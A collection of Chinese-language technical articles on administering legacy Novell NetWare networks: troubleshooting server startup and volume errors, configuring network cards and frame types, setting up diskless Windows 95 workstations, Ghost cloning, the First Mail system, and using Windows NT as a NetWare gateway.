    答 由于3.x版没有目录服务功能，因此无法将其纳入到目录树中，常常会与4.x和5.x版产生网上冲突，而使客户无法登录到3.x版服务器，从而出现3.x服务器被“压倒”的现象，所以建议把已有的3.x版升级为4.x以上的版本，从而将其集成到一个目录树上，克服因版本差别而造成的故障。最后，要注意的是同一物理网上的所有服务器的逻辑网络号必须是一样的(注意不是IPX内部网络号，这个号，不同的服务器必须要不一样)，否则还将造成路由检测故障。
    问题3：文件服务器不能正常启动，提示卷安装失败。
    答 由于突然停电或某些别的原因可能造成卷的损伤，其现象有多种，例如：服务器无法正常安装卷，或服务器能正常启动，但工作站不能与服务器连接等，出现类似下面的提示：“Mirror copies of directories and name space not match”,“Volume not mounted”。此时，可以采用卷修复方法，对不太严重的错误进行修复。Vrepair(Volume Repair)是一个功能强大的可装入模块，具体的修复步骤如下：
    1、把此卷卸下，输入以下命令：
    Dismount volume－name (其中，volume－name为要修复的卷名)
    2、在服务器控制台上键入以下命令：
    Load Vrepair
    3、进入菜单系统，首先选择“Repair a Volume”，然后屏幕提示：
    Total errors:0
    Current settings:
    1.Pause after each error
    2.Do not log errors to a file
    Press F1 to change setting
    在修复时如果屏幕提示错误较多，可按F1键不必让Vrepair在每个错误停下来，可以大大提高修复速度。
    4、当Vrepair运行结束后，屏幕提示：“Write vrepairs to the disk(y/n)?”，键入“y”将修复结果写入磁盘，进行如此操作后，若卷仍未修复，可再进入Vrepair菜单中选择 “Set Vrepair Option”项，运行完后，卷一般会安装成功。如仍不能安装，则必须删除这个卷，用Install重新安装这个卷，并从后备文件中恢复数据。
    问题4：在服务器启动过程中，突然停下来询问服务器的名称、内部网络号等，然后停下来等待键入命令。按屏幕提示输入文件服务器名（File server name）和IPX内部网络号（IPX Internal network number）后，进入控制台提示符状态，此时装入其它NLM模块，系统提示：“Unable to find load file ….”。
    答 这种故障可能是由以下原因所致：
    1、由系统配置文件Autoexec.ncf或Startup.ncf损坏所致。Autoexec.ncf的主要作用就是给文件服务器起名、分配IPX内部网络地址、加载网卡驱动程序、分配网卡传输协议、分配网段地址及装载指定的NLM等。可以从以下几种情况来确定其原因：一种情况是该文件中的多个逻辑网卡（以帧不同来区别）对应的逻辑网络号相同（指BIND语句中“NET=”后面的参数相同），正常情况下应互不相同；二是由于某些语句的参数不完整，例如服务器名、IPX内部网络号、逻辑子网号、PORT值、中断号、IP地址和子网掩码等丢失；三是缺少某些必需的语句，例如网卡加载语句后面无BIND语句或不配对、没有卷安装语句等等；四是该文件中的服务器名或IPX内部网络号与同一物理网络上的其他服务器相同；五是该文件中逻辑子网络号与同一物理网上其他的服务器不同（要求必须一样，否则将产生冲突）。解决方法是从备份中恢复该文件，或利用Install实用程序重新建立Autoexec.ncf。
    2、sys卷有故障。Netware的系统核心Server.exe装入startup.ncf中的硬盘驱动程序后，无法从损坏的系统卷中找到Autoexec.ncf，可按照上一问题的方法对sys卷进行修复，修复之后即能正常启动。
    3、最后要看一下BIOS设置得是否正确，特别是对安装有多个硬盘的用户，有时经常换硬盘而忘了修改设置参数等项。
    问题5：随着应用程序的不断增大，特别是流量突然增加时(象同时开机远程启动Win 95时)，导致网络通信性能下降，网络速度变得很慢，以至无法正常工作。
    答 为了提高网络速度，在服务器“中枢机关”(即CPU、内存)性能良好的前提下，可采用增加网段的方法来解决。由于大多网络都采用总线型和星型混合的拓扑结构，增加网段就是指在文件服务器中多插几块网卡(最多可插四块)，将局域网上的工作站平均分给这几个网段，再在Autoexec.ncf中写入以下类似命令，注意I／O地址值和IRQ值必须与网卡实际占用的I／O地址和IRQ值相符。
    Load ne2000 port=300 int=2 frame=ethernet_802.2 name=a
    Bind ipx to a net=1
    Load ne2000 port=320 int=3 frame=ethernet_802.2 name=b
    Bind ipx to b net=2
    这样每段网络的负担只有原来的几分之一，速度自然就提高了。
    问题6：无盘工作站不能正常登录服务器，工作站屏幕上出现“Error opening boot disk image file ”or“Unable to open image file”提示。
    答 这可能是连到了一个没有包含远程启动映象文件的服务器上，可以把启动映象文件拷到这个服务器的Login目录下；如果使用的是多远程启动映象文件，检查Bootconf.sys中对工作站是否进行了正确设置，应确保网络地址和节点地址的正确。如果以上方法都不能解决问题，那么很可能是远程启动映象文件有问题，可以测试生成启动映象文件的软盘能否正常启动有盘工作站。若还不行，可以运行一下RPLFIX实用程序。
    问题7：工作站屏幕上出现“Error finding server”提示。
    答 在确保硬件线路连接没问题的前提下，检查服务器上是否安装了“Ethernet_802.3”帧类型，远程启动映象文件的Net.cfg 中是否包含Ethernet_802.3，这是旧型的IPX芯片，它不支持Ethernet－802.2帧，应该按照相应的帧类型重新制作启动映象文件。
    问题8：无盘工作站不能正常登录服务器，工作站屏幕上出现“batch file missing”信息。
    答 出现这个信息是由于Autoexec.bat或其他批处理文件（对多个远程启动映像所使用的批处理）没有同时存在于Login目录和用户登录目录中。
    问题9：工作站无法转入网络盘F。
    答 这主要是由于远程启动映象文件Config.sys中Lastdrive的值所引起的，解决方法是：对于IPX和ODI工作站（使用NETX外壳），Lastdrive=E或将其删除；对于VLM工作站，应在Config.sys中加入Lastdrive=Z这一句。
    问题10：无法正常运行Netadmin实行程序。
    答 Netadmin程序是基于目录服务的管理程序，在Netware 4.x版中使用，因此，这种故障是由于采用了IPX或ODI(使用NETX外壳)工作站方式登录入网造成的，必须改为由具有目录服务功能的VLM外壳工作站登录才行。

返回


Novell网安全维护“三板斧”

《一键清理系统垃圾》

Novell网安全维护“三板斧”

    在目前的局域网中，Novell网占了相当大的比例。本文根据笔者多年来从事网络教学和网络维护的经验，以目前广泛采用的Netware312网络操作系统为例，介绍安全使用Novell网的三种方法，希望能给众多的网络管理人员和网络用户有所帮助。

    一、让超级用户(Supervisor)在指定的工作站上登录服务器

    为了防止一般用户使用Supervisor的功能，常常给Supervisor用户设置口令，只有系统管理员知道其口令并能以Supervisor的身份登录，但有时此口令可能被他人窃取，从而对网络进行一些破坏性的操作。为了防止这种现象的发生，可指定在某一台或几台机器上使用Supervisor的口令，其他工作站用Supervisor登录时，系统拒绝登录。具体设置方法如下：
    从任何一台工作站以 Supervisor登录服务器，执行网络命令“SYSCON”，之后出现“Available Topics” 窗口，选择此窗口中的“User Information”选项，在弹出的用户列表窗口“Use Names”中选择“Supervisor”用户，又出现“User Information”的窗口，选择此窗口中的“Station Rest rictions”选项，弹出“Allowed Login Addresses”窗口。此时按 “Insert”键，将出现一个小窗
口 “Network Addres:____”，在光标闪烁处输入指定工作站的地址，如：“002B00042891”，输入正确后按回车确认(此地址即工作站的节点地址，一般是一个32位的16进制数)。如需要，此时还可以用同样的方法设置另外几台工作站的地址号码，所设置的地址号码均显示在“Allowed Login Addresses” 的窗口列表中，如要取消已限制登录的工作站，可将此工作站的地址号码从窗口的列表中删掉即可。经这样设置后，用户使用Supervisor登录时，只能在所限制的工作站上登录，在其他工作站上登录时，Supervisor及其口令均无效。

    二、禁止工作站的软、硬盘与服务器相连

    工作站安装软、硬盘驱动器后，一方面给普通用户提供了便利，同时另一方面也给网络的安全带来了隐患，如给病毒入侵网络提供了方便，用户可非法拷贝网络服务器上的数据或将与网络无关的软件或文件拷入服务器等。为了防止以上现象的发生，可将有盘(软、硬盘)的工作站在上网后自动设置成为无盘工作站。
    在Netware312中将26个字母(A～Z)中的A～E定义成为工作站本地驱动器，将F～J定义成为网络驱动器，将K～Z定义成为搜索驱动器。要将有盘工作站在上网后设置成无盘工作站，即在登录后取消A～Z为本地驱动器的定义，可用网络命令MAP将A～E表示5个本地盘符的字母分别映射到服务器上一个或几个指定的目录下，让工作站的物理软、硬盘失效。具体实现方法如下：
    1在服务器上建立一个公用目录USE(用户自定)，并将此目录USE 开放给每一用户，并使用户对此目录具有足够的访问权限[RWCEMFA]。
    2修改系统登录原稿。将要从有盘工作站登录的所有用户归于同一个用户组YHGROUP(用户自定)，之后在系统登录原稿“System Login Script”中增加以下的命令行：
    IF MEMBER or ″YHGROUP″ THEN
    Map A:=SYS:
    Map B:=SYS:
    Map C:=SYS:
    Map D:=SYS:
    Map E:=SYS:
    ENDIF
    经以上设置后，有盘工作站一旦登录服务器，本地的软、硬盘便失效，断开了与服务器的连接，对网络起到了较为可靠的保护。

    三、安装网络防杀病毒软件

    安装网络防杀病毒软件是保障网络正常运行的另一有效方法。防止计算机病毒侵入网络后对网络系统造成破坏，保证网络在无病毒状态下安全运行是每一个网络管理人员的重要工作职责。然而，由于网络操作系统的自身特点，对病毒的预防和清除远远不像单机那样简单，一旦因病毒而造成系统故障，甚至导致系统瘫痪，一般情况下其损失将非常严重。为此，希望网络管理人员能给自己的网络安 装一套网络防杀病毒软件。

返回


Novell网故障三例的排除

《一键清理系统垃圾》

Novell网故障三例的排除

   例1．工作站无法转入网络盘F

    现象：Novell服务器启动正常，工作站启动完毕后不能转到F盘符下。
    分析过程：出现这种故障一般是因为工作站的CONFIG.SYS文件中的LASTDRIVE的值定义错误造成。
    解决办法：对于使用NETX外壳的工作站，LASTDRIVE的值应为E，对于使用VLM外壳的工作站，LASTDRIVE的值应为F。

    例2．代码页错误

    现象：当使用中文DOS启动工作站后，在LOGIN下注册服务器时，不能注册到服务器,且系统提示代码页错。
    解决方法：在服务器上增加中文代码页支持或在工作站的CONFIG.SYS文件中增加一行：country=001，437，c:\dos\country.sys。

    例3．路由检测出错

    现象： Novell服务器启动起来后，在控制台上出现:Router configuration error datected Node 0060B03C4A53()Claims network 65431233 should be B0B0B0B0 Node 0060B03B4A73()Claims network 65431233 should be B0B0B0B0 信息，以上信息说明物理网络地址为0060B03C4A53、0060B03B4A73的网卡和逻辑子网号为65431233的服务器不相容。
    分析过程：出现这种情况是因为在同一物理网络上已有１个以上不同的时间服务器，且时间服务器AUTOEXEC.NCF文件中同一种帧类型的逻辑子网号不相同造成（逻辑子网号不是IPX内部网络号，IPX内部网络号和逻辑子网号均在AUTOEXEC.NCF文件中定义。如：IPX被定义为：
    〉internal network number:382AE47CNODE address:000000000001Frame
    〉type：VIRTUAL_LANLAN Protocol:IPX network 382AE47C.....load 3C5X9.LAN
    〉INT=5 PORT=300 FRAME=Ethernet_802.2 NAME=NET1bind IPX to net1
    〉net=62B10306
    〉以上的几条语句定义了该服务器的IPX内部网络号为382AE47C、节点地址为000000000001、逻辑子网号为=62B10306。 每一台服务器的IPX网络号必须不同，否则，工作站将不能正确访问服务器。
    解决方法：在INSTALL的LAN/WAN菜单下修改AUTUEXEC.NCF文件中该网卡同帧类型的逻辑子网号:NET=XXXXXXXX,使其和另一台服务器同种帧类型的逻辑子网号一致，即可解决问题。

返回


Novell网快速克隆Windows 9x

《一键清理系统垃圾》

Novell网快速克隆Windows 9x

    时下，以Win 9X为工作站的校园局域网大为流行。但作为机房管理人员，让人感到头痛的是Win 9X工作站上的系统文件常给学生删除了，导致操作系统崩溃。如果为每个工作站重新安装Win 9X及应用软件，少则需要一个多小时，多则几个小时，费时费力。有没有方法能快速安装完这些软件呢？经过一段时间的摸索，笔者找到了一种好的方法，系统问题迎刃而解。下面笔者以一个Novell网为例，说明如何在局域网中为每台机器快速克隆Win 9X及应用软件。

    1、选择一台工作站，按普通方式单机安装Win 9X及应用软件， 必须保证此安装完全正确并且无任何错误的运行。运行GHOST软件，利用GHOST软件的Disk to image(盘对镜像拷贝)功能把工作站盘上的信息克隆为一个镜像文件Win 9X.ght。需注意的是选择的工作站应该能够代表网络中的大多数机器的配置。一般而言，网络中的工作站具有相同的硬件配置。

    2、在工作站上以超级用户入网， 在服务器硬盘上建立Win 9X子目录，把镜像文件Win 9X.GHT拷至Win 9X子目录下，将Win 9X子目录权限设为只读，在系统登录脚本中将Win 9X子目录映射成一个盘(如MAP H:=SYS:\Win 9X)。

    3、恢复工作站软件。经过以上准备工作后，要恢复工作站软件只需在工作站上以普通用户登录入网，运行GHOST软件，选择Disk from image(镜像到盘拷贝)，等待约十几分钟后，一个装有你所需操作系统和应用软件的硬盘便安装完了。

    使用当中应注意：用Ghost“克隆”硬盘(或分区)后，原来的数据全部被覆盖；因此，如果硬盘不是太小的话，应当做一下分区，把需要保存的数据放到D：、E：或者网络服务器上。另外，有的软件像UCDOS等启动时要认主板信息，从别的机器“克隆”来的不能正常运行，要重新安装。

    最后提醒大家的是根据需要，也可单独将各分区克隆为不同镜像文件，看哪个分区数据破坏了，就只克隆此分区以加快恢复速度。 此方法同样适应以Windows NT为服务器的局域网。

返回


Novell网上的电子邮件系统First Mail

《一键清理系统垃圾》

Novell网上的电子邮件系统First Mail

对Windows NT上的电子邮件系统，大家可能已经非常熟悉了。这里要介绍的是运行在NetWare上的、占用资源极少且性能先进的电子邮件系统——First Mail。本文的介绍将以NetWare 3.12环境为主，在NetWare 4.1中，First Mail的安装、使用方法与此稍有不同，不仅更方便且支持NDS，详情请参见NetWare 4.1的有关文档。

    一、安装环境
    1.硬件：文件服务器安装有CD－ROM，内存不少于8MB，硬盘的NetWare分区上可用空间不少于4MB。
    2.软件：文件服务器运行在NetWare 3.12上，且服务器上已备有下列软件：NetWare Btrieve V5.15或更高版本、NetWare C运行库（CLIB.NLM）V3.11e或更高版本。如果你无法得到上述两个软件的单独发行版，你可从NetWare 4.1中将相关文件拷贝出来。运行Btrieve你需要的文件为：bspxcom.nlm、btrieve.nlm、brequest.exe、brequtil.exe、nstart.ncf。

    二、安装MHS和First Mail
    1.在文件服务器上加载Install模块，在文件服务器控制台上键入命令：
    Load Install；
    2.在Install选项中，选Product Options，回车；
    3.将NetWare 3.12光盘放入CD－ROM，假设CD－ROM的盘符为D；
    4.按Insert键，屏幕将提示输入产品所在目录，这时键入：
    D:\NETWARE.312\BASICMHS；
    5.按系统提示回答以下问题：
    [Default] Workgroup long name: FS1999（缺省，工作组的长名为：FS1999）
    Accept Workgroup long name?[Yes|No|Quit]: >Y（确认这个名字？）
    [Default] Workgroup short name: FS1999（缺省，工作组的短名为：FS1999）
    Accept Workgroup long name?[Yes|No|Quit]: >Y（确认这个名字？）
    [Default] Mail Volume Path: FS1999/SYS:（缺省，邮件卷路径为FS1999/SYS：）
    Accept Mail Volume Path?[Yes|No|Quit]: >Y（确认这个路径？）
    Enable Messagin Services for Existing Users? [Yes|No|Quit]: >Y（为所有用户开放邮件服务？）
    Use Full name for user's mail name? [Yes|No|Quit]: >N（是否为用户的邮件地址创建全名？）
    Update System Login? [Yes|No]: >Y（自动更新系统注册底稿吗？）
    Update Autoexec.ncf File? [Yes|No]: >Y（自动更新AUTOEXEC.NCF文件吗？）
    说明：First Mail中用户的邮件地址格式为：〈User Name〉@〈Workgroup〉。在上述安装过程中，由于在“创建全名”时选择N，系统默认〈User Name〉为Login Name。假设网上现有登录名为Guest、Goodboy、Chinablue的三个用户，在上述安装过程中他们的邮件地址就分别被分配为：guest@fs1999、goodboy@fs1999、dhinablue@fs1999。
    6.用DOWN命令关闭文件服务器，再重新启动，MHS将自动加载。
    7.在服务器控制台上键入：LOAD BSTART。当屏幕上出现一个选单，选择Set
    Configuration。
    请把下列参数设置到指定的水平：
    Number of transaction=2（或更多）
    Largest page size=4096
    至此也就完成了MHS和First Mail的全部安装工作。

    三、卸载MHS
    作为管理员，也许希望在某些时候关闭邮件系统，此时可在服务器控制台上键入命令：UNLOAD BASICMHS。这个命令仅仅关闭邮件服务功能，且不会影响文件服务器的正常运行。

    四、管理和配置First Mail
    ADMIN在工作站端使用。
    1.运行ADMIN之前，必须先运行BREQUEST。BREQUEST将作为TSR驻留在内存中，使用完毕可用命令BREQUTIL －STOP卸载。
    2.键入命令：ADMIN，屏幕将出现Admin Function选单。
    3.Admin Function中各选项说明：
    Users(用户)：选此项将显示所有邮件帐户。用INS键可加入新的邮件账户。
    Distribution list（分发清单）：建立分发清单可将同一邮件发送给多个用户。
    Applications（应用程序）：有些独立的邮件应用系统也支持MHS，你可以通过本选项将其挂接在MHS上。具体情况请参见独立邮件系统的说明和ADMIN.DOC。
    Configuration（配置）：允许你修改MHS的配置，详情请见ADMIN.DOC。

    五、使用First Mail
    1.要启动FirstMail，应运行PUBLIC目录中的MAIL.EXE程序。
    2.Mail Options中各选项说明：
    N：Check for New Mail（阅读新邮件选项）。当收到新邮件时，这一项会出现在First Mail窗口的最上面，你可用此项阅读新邮件。如果没有新邮件，则此项不出现。 S：Send a Mail Message（发送邮件选项）。这个选项用于发送、编辑邮件。在“TO：”后面填入邮件地址，也可按F2键从地址簿中选择。在“Subj：”后面填入邮件主题。写好邮件后，用〈CTRL〉＋〈ENTER〉将邮件发出。你还可以用F7键附加文件，让它们随邮件一起发出。附加文件的类型不限，但不能多于64个。
    B：Browse Mail Messages（阅读、回复、转发邮件选项）：本项可用来查看已阅读过的邮件。要回复一个邮件，按R键。要转发一个邮件，按F键。要将一个邮件打印出来，按P键。
    C：Change File Server（改变文件服务器选项）：有一个以上的文件服务器运行且你的邮件在另一个文件服务器上时，你需要用到此项。
    P：Preferences（设置选项）可供设置内容如下：
“Copy－Self Settings”：定义发送邮件后是否自己留底。
“Editor and Keyboard Settings”：配置编辑器。
“General Settings”：配置First Mail的操作方式。
“NetWare SMF/MHS Settings”：有关MHS的设置。
“Change Home Mailbox Location”：修改邮件位置。
“Print Settings”：打印设置。
“Edit or Create Singnatures”：编辑或创建签字文本。
    使用中如有什么问题，欢迎与china－blue@163.net。

返回


Novell网特殊故障一例

《一键清理系统垃圾》

Novell网特殊故障一例

    故障现象
    一台Novell服务器，其引导正常，网络IPX协议启动正常，但工作站却不能注册。

    解决过程

    计算机开机自检未发现任何错误提示，启动Novell服务器也没有任何错误提示，在控制台上用Config命令查看网络系统配置也正常，再用Monitor的LAN/WAN information菜单观察LAN设备也未发现任何错误，维修陷于困境。
    问题究竟出在那里呢？与工作站通信的出入口是网卡，问题很可能就在网卡上。带着这个想法，重新启动计算机反复观察网卡设备信息，发现计算机系统自检显示该网卡的中断号为5，当前处于PNP模式。将此信息记下，再启动Novell服务器，查看AUTOEXEC.NCF文件，发现网卡的中断号配置为3，IO ports 为300H。再用控制台上的Config命令查看网卡启动配置信息，发现网卡的中断号为10，Port=300。从以上信息不难看出问题就在网卡的配置上。问题找到了，用网卡设置程序在DOS状态下重新将网卡的IO Base Address参数设置为300，Interrupt Request Level 设置为5， 屏蔽PNP功能，再将AUTOEXEC.NCF文件中的网卡中断设置为INT=5。重新启动服务器，此时工作站注册服务器成功。

    经验小结

    当网络系统出现异常时，要根据实际情况确定问题的关键点，关键点确定后，再仔细观察分析，透过一些蛛丝马迹发现实质性的问题，本例就是一个比较典型的例证。本例的情况比较特殊：网卡的IO参数配置、服务器 AUOTEXEC.NCF参数配置和服务器LAN启动参数三者完全不同，似乎不可理解，其实也不难理解。笔者以为出现这种问题的结症在于：网卡处于PNP状态。网卡处于PNP状态时，当系统调用AUTOEXEC.NCF 为网卡分配中断号3时，中断3已被COM1口占用，系统要选择一个空闲中断号给网卡，而中断5已被其自身占用，系统自动为其分配一个空闲中断号10，故而会出现上面的一幕。

返回


NOVELL下的PWIN95无盘工作站

《一键清理系统垃圾》

NOVELL下的PWIN95无盘工作站

无盘工作站由于投资少，易管理，并可有效地防止由于使用磁盘而带来的病毒感染问题，有一定的实用价值。但在NOVELL无盘工作站上安装PWIN95时，常常会碰到一些问题，致使安装不成功，笔者经过摸索，现总结如下：

一、硬件环境及软件

一台NOVELL服务器（3.X以上）。
WIN95完全版或PWIN95的完全版。
一台已安装好PWIN95有盘计算机。
无盘工作站，且RAM最好不小于12M。
95完全版\ADMIN\NETTOOLS\NETSETUP\NETSETUP.EXE,该文件代替了WINDOWS3.2是的SETUP/A。
95完全版\ADMIN\NETTOOLS\NETSETUP\BATCH.EXE,用于建立无盘工作站安装PWIN95时的SCRIPT文件MSBATCH.INF,工作站安装PWIN95时是按照MSBATCH.INF进行自动安装的。

二、准备工作

由于PWIN95支持长文件名，因此SERVER端也一定要支持长文件名，如何支持长文件名?

在NOVELL3.12服务器上，进行下列工作：

LOAD OS2.NAM (并加入到AUTOEXEC.CNF中)

ADD NAME SPACE OS2 TO VOLUME(卷名)

三、PWIN95在服务器上的安装

启动一台PWIN95工作站。
运行完全版PWIN95中\ADMIN\NETTOOLS\NETSETUP\NETSETUP.EXE,将PWIN95安装到服务器上，在安装时，各选项选定如下：
设定路径: \\服务器名\卷名\共享目录名,如：\\NOVELL\APP\PWIN95

共享文件在: 服务器

安装来源: 升级版

是否建预设值: 不用预设值,在安装完后,用BATCH.EXE再建SCRIPT（即MSBATCH.INF）。

在安装完成后，设置该目录及子目录为共享目录
FLAG \PWIN95 S SU

用英文版的WINBOOT.SYS(IO.SYS)来替换中文版的WINBOOT.SYS，也许是BUG的原因，用中文版的WINBOOT.SYS极容易死机或安装失败,而安装英文版的WIN95无盘工作站时则比较顺利，故采用英文版的WINBOOT.SYS来代替中文版PWIN95的WINBOOT.SYS，结果一切正常？

四、设定工作站安装时的批处理文件MSBATCH.INF

在一台完整的PWIN95工作站上运行95完全版的\ADMIN\NETTOOLS\NETSETUP\BATCH.EXE，该文件把我们正常安装WIN95时应该输入的资料及设定等预先写入到MSBATCH.INF ,以后各工作站安装PWIN95时便依照MSBATCH.INF中的设定自动安装，在运行BATCH.EXE时,主画面如下：（略）

在BATCH.EXE中的所有设定都是针对工作站,如Computer Name应填工作站的计算机名称，不可填服务器名称。

在MSBATCH.EXE主画面上,有三个SETUP选项,其中Network Options是一个十分重要的选项，选择该项则进入Network Options画面，如下：（略）

在NETWORK OPTIONS的Available protocols中，要注意勾选 IPX/SPX协议，FRAME预设是AUTOEXEC,也可选802.2OR 802.3

必须勾选CLIENT FOR NETWARE NETWORK

勾选“Enable Server Based Setup”中选“Remote Boot”（远程启动）。

从MSBATCH.EXE主画面选Installation Options项进入安装选项,如下图:（略）

安装目录应填工作站PWIN95安装在服务器上的目录，如W:\CLIENT1,且该用户必须对该目录有写权,千万不能填回到服务器的PWIN95的共享目录!!!!

从MSBATCH.BAT主画面进入Optional Components安装组件选项选择要安装的组件时，选越少越好,最好都不选。以后在工作站运行PWIN95时，再通过新增应用程序时来安装这些组件。

在全部设置完成后,应取名MSBATCH.INF保存到服务器的PWIN95共享目录中。

五、设定MACHINES.INI文件

在服务器PWIN95的共享目录中，有一个MACHINES.INI文件,用于设定各工作站系统注册文件位置，其格式如下：

;Windows 95 MACHINES.INI

;[node address]

;SYSDATPATH=x:\<home directory>

;x=\\server\share

[000021003131]

SYSDATPATH=w:\client1

f:=\\novell\sys

g:=\\novell\user

w:=\\novell\app

……

[000021004acd]

SYSDATPATH=w:\client2

f:=\\novell\sys

g:=\\novell\user

w:=\\novell\app

……

六、 无盘工作站上PWIN95的安装

在完成了上述工作以后，工作站上的安装便十分简单了，只要在上述MACHINES.INI中已经包含了系统注册信息的DOS无盘工作站上启动入网,进入共享目录运行安装程序SETUP.EXE，如：

W： （PWIN95共享目录所在的影射盘）

CD PWIN95

SETUP ／T: W:\TEMP /IS/ID

其中W:\TEMP为安装时需要的临时目录，该选项必须要有，否则在安装时会出现无法装载程序（error loading progman.exe）的出错信息，而导致安装失败。/is 和/id为可选项。

实际上这时候的SETUP是按照MSBATCH.INF中的设定进行自动安装的，因此整个过程除了要回答是否遵守协议外，其余都是自动进行的。

在安装时,如果硬件检测时通不过,则应减少硬件的检测项。

在完成后,可能会不REBOOT,而出现 Invalid DPMI return from xxxx:xxxx,只要复位热启动即可。

经上述步骤后，将产生一个NET＄DOS.SYS在工作站PWIN95的安装目录（如：W:\CLIENT1)下,另找一台工作站，把该文件拷贝到服务器的F：\LOGIN目录下(注意先把原先的NET$DOS.SYS备份)。重新启动无盘工作站，可看到无盘工作站上大旗飘飘，进入了PWIN95的最后设置阶段，设置完毕重新启动，便可大功告成，正常进入PWIN95了

返回


Novell自己如何利用NDS

《一键清理系统垃圾》

Novell自己如何利用NDS

     “陶尽门前土，屋上无片瓦”，在现代IT企业也是一种经常的现象。Novell则不然，Novell的每一个产品上市之前，都要在Novell自己的信息系统中检验过。8月30日，Novell亚太区信息系统和技术（IS＆T）总监SamGennaoui在京介绍了他实施NDS的经验，主要包括以下几个方面：
    1．降低费用。Novell在全球有5000多个用户、36000多台电脑。分布在40多个国家、100多个城市；有800多个系统，平均每个用户要使用5～6种应用。这样大的系统，管理工作量之大是可想而知的。IST采用基于NDS的HelpDesk功能，维护人员可以在中心位置管理整个网络，从而把维护人员的数量压缩到25％，即一个人支持4个办公室。按照Novell财务部门的统计，每年节约的网络运行管理费用达90万美元。
    2．动态定位。这一项功能使Novell的员工无论出差到何地，都可以方便地利用随身携带的笔记本电脑在本地的Novell办公室登录公司网络。新上网的电脑动态地获得IP地址，在当地通过NDS认证，自动从服务器上获得身份。
    3．VPN功能。Novell在不少有分支机构的国家，已经能够利用VPN功能。Novell员工只要呼叫本地电话，通过本地ISP获得Internet服务。
    4．桌面管理。在Novell的网络上，有800多个系统在运行，一个软件经常有多个版本，不少软件是试用版，需要不断更新。因此，软件安装的工作是大量的。靠ZENworks的软件分发、远程支持、软硬件资产管理功能，才解决IST劳碌之苦。
    5．广域网管理。在Novell的网络上，可以利用Browser从任意位置监视全网的流量。如果发现线路阻塞，将根据Novell同运营商签署的SLA协议，给运营商发一个令牌，请运营商协决解决。这样，一个人就可以管理Novell全球的WANLink。

返回


NT的NetWare网关服务

《一键清理系统垃圾》

NT的NetWare网关服务

    案例分析

    让我们先讨论两个实际情况。
    1. 我们原来的教学环境是装有40台无盘工作站的NetWare 4.11的网络系统，以前我们的教学内容主要是基于DOS的（如DOS 6.22、UCDOS 5.0、WPS、FOXBASE 2.10）。但为使学生接触到最新的知识并兼顾大学生须通过等级考试的实际情况，我们在机房里增添了一台Windows NT Server 4.0服务器，但此Windows NT Server 4.0最多只支持25个用户，所以这40个无盘工作站一部分登录NT服务器，一部分登录Novell 4.11服务器。在使用的过程中，出现了这样的情况：由于经常需要更新或添加软件，对NT服务器来说很方便，因为NT本身和NT网上的教师机上有硬盘且装了光驱；但对于Novell 4.11服务器来说就很困难，因为在向Novell 4.11服务器安装软件时，必须从Novell网络的工作站上安装，而我们的Novell网络上的所有工作站全部是无盘站，这样要想向Novell服务器上装大型软件就很麻烦。于是我们采用如图1所示的方法。

    在图1中，把NT服务器当作访问Novell服务器的网关，当Novell服务器需要任何软件时，可从教师机的光驱上进行安装，减少了在Novell服务器上安装软件的麻烦，且登录NT服务器的所有工作站也都可访问Novell服务器。
    2. 某单位原先建立了一个Novell局域网络，在此局域网上开发的DOS版本的全文检索应用程序和全文数据库存放在Novell 3.12服务器上；远程拨号用户通过电话线连接到NAS（NetWare Access Service）服务器上，也能执行Novell服务器的全文检索程序和数据库查询等操作。以前只有少数几台机器接入了Internet网络，Novell服务器作为一个Internet邮件服务器，每台机器都申请了IP地址。
    后来随着Internet的发展，上网费用的降低，需要上网的用户越来越多，申请的IP地址已不够用。为了改变这种情况，对网络进行了改造，改造后的网络分为外部网络和内部网络两部分，只有外部网络中的计算机需要IP地址，内部网络上的计算机采用Internet地址中专门用于内部网的地址（可用的地址包括A类子网地址：10.0.0.0；B类子网地址：172.16.0.0～172.31.255.255；C类子网地址：192.168.0.0～192.168.255.255），把Novell服务器放在外部网上。其主要原理是：把NT服务器当作一个代理服务器（在NT上运行Microsoft Proxy Server）和NetWare网关，既解决了IP地址不足的问题，远程用户通过电话线又可以收发Internet邮件，内部网上的工作站仍然能运行Novell服务器上的全文检索程序。其工作原理可用图2说明。

    由以上两例可知，NT服务器充当NetWare网关是非常有用的，下面探讨怎样把NT服务器设置成NetWare网关。

    NT服务器的设置

    1. 安装NetWare网关服务
    （1）选用“开始”→“设置”→“控制面板”→“网络”→“服务”→“添加”，出现“选定网络服务”对话框，请选择“NetWare网关服务”，然后单击“确定”；
    （2）输入安装文件的源路径，然后单击“继续”；
    （3）如果您还未安装Nwlink IPX/SPX通信协议，此时会自动安装，因为需要利用Nwlink IPX/SPX与NetWare通信；
    注意：在自动安装Nwlink IPX/SPX通信协议时，同时也会自动设置内部网络号（Internal Network Number）、帧类型（Frame Type）。如果这些设置与NetWare服务器的设置不同时，可利用“网络”对话框下通信协议NWLink IPX/SPX兼容传输进行修改。
    （4）当回到“网络”对话框时，单击“关闭”，然后重新启动。
    重新启动后，会发现在“控制面板”中多了一个“GSNW”的图标。
    2. 启动NetWare网关服务
    （1）选用“开始”→“设置”→“控制面板”→“GSNW”；
    （2）出现“NetWare网关服务”对话框，设置“首选服务器”（Netware 3.X）或“默认目录与内容”（Netware4.X NDS）。然后单击“网关”；
    （3）出现“配置网关”对话框，选择“启用网关”，然后在“网关帐号”处输入登录NetWare服务器的帐号，同时在“密码”与“确认密码”中输入帐号的密码；
    （4）单击“配置网关”对话框中的“添加”将NetWare上的目录设为共享目录。例如如果想把NetWare服务器上SYS卷上的PUBLIC目录共享，且共享名为PUBLIC，则在“共享名”处输入“PUBLIC”，在“网络路径”中输入“\\nw312\sys\public”，这一步很重要，NT上的工作站只能访问在这一步设置的共享资源。
    （5）工作站通过网关访问NetWare服务器上的资源，工作站的访问权限就与网关帐号的权限相同。单击“配置网关”对话框下部的“共享名称”，然后单击“权限”，可以设置修改权限。

    NetWare服务器设置

    （1）首先建立一个网关帐号，如NTUSER，且此帐号对NetWare服务器拥有适当的权限（可以给它NetWare的超级用户的权限，至于其他用户对NetWare的权限，可在NT上另行设置，参见NT服务器的设置中启动NetWare网关的步骤（5））；
    （2）在NetWare服务器上建立一个名称为NTGATEWAY的组；
    （3）将所建立的帐号（如刚刚建立的NTUSER）加入NTGATEWAY组内；
    （4）登录到NT服务器上的帐号（非网关帐号），也必须在NetWare服务器上有帐号，且需在NetWare服务器上拥有权限。

返回


Windows 95工作站如何进入Novell网

《一键清理系统垃圾》

Windows 95工作站如何进入Novell网

